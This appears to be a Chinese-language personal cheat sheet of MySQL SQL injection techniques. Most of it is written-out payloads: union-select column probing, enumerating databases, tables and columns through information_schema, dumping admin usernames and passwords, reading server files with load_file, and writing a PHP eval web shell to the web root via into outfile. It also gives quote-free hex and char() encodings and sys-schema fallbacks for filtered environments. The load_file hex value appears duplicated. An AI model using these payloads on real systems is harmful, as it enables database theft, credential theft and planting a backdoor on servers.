MySQL注入总结
常用词汇
-
information_schema
-
information_schema.schemata 查库名 [[注入函数#系统信息函数]]
-
information_schema.tables 查表名
-
table_schema 指定表的数据库
-
table_name 表名
-
column_name 列名
变量形式
table_schema=database(),[[hex编码]],[[char()]]
不用单引号:
select ‘root’(英文形式的单引号)
select char(114,111,111,116) #待处理标签缺少易转化工具
select 0x726F6F74 #小技巧去掉0x需要加上单引号引住 hex() ,unhex()
注入语句
联合查询
-
查询列数
id=1 order by 3
-
查看回显位
id=-1 union select 1,2,3
-
查询变量信息
id=-1 union select 1,database(),3
-
查询所有数据库
select group_concat(schema_name),2,3 from information_schema.schemata
-
查询指定数据库的所有表名[[#变量形式]]
select group_concat(table_name ),2,3 from information_schema.tables where table_schema=database()
select group_concat(table_name),2,3 from information_schema.tables where table_schema=0x6462746F70676C6F7269613539
-
查询指定数据库的表读取列名[[#变量形式]]
select group_concat(column_name),2,3 from information_schema.columns where table_name=char(108, 107, 95, 97 ,100, 109, 105, 110, 95, 117, 115, 101, 114) and table_schema=0x6462746F70676C6F7269613539
-
查询指定数据库的表和列,读取列的值
select user_name,password,3 from lk_admin_user limit 1,2
-
读文件
select 1,load_file(0x2F7661722F7777772F68746D6C2F646174612F64617461746573742E7068700x2F7661722F7777772F68746D6C2F646174612F64617461746573742E706870),3
-
写文件
select 1,’<?php @eval($\_POST\['Bloo166'\]) ?>’,3 into outfile ‘C://www//function//2.php’;
跨库查询,一般是root权限,从web数据库的user表读取pass值
SELECT 1,2,group_concat(column_name) from information_schema.columns where table_name=chr(117,115,101,114) and table_schema=0x776562
SELECT 1,2,group_concat (pass) from user where web
在mysql5.7版本,新增了sys公共库,使得我们可以在information被过滤了之后使用sys库里的一些表来查询库和表
SELECT table_schema FROM sys.schema_table_statistics GROUP BY table_schema;
SELECT table_schema FROM sys.x$schema_flattened_keys GROUP BY table_schema;
SELECT table_name FROM sys.schema_table_statistics WHERE table_schema=‘test’ GROUP BY table_name;
SELECT table_name FROM sys.x$schema_flattened_keys WHERE table_schema=‘test’ GROUP BY table_name;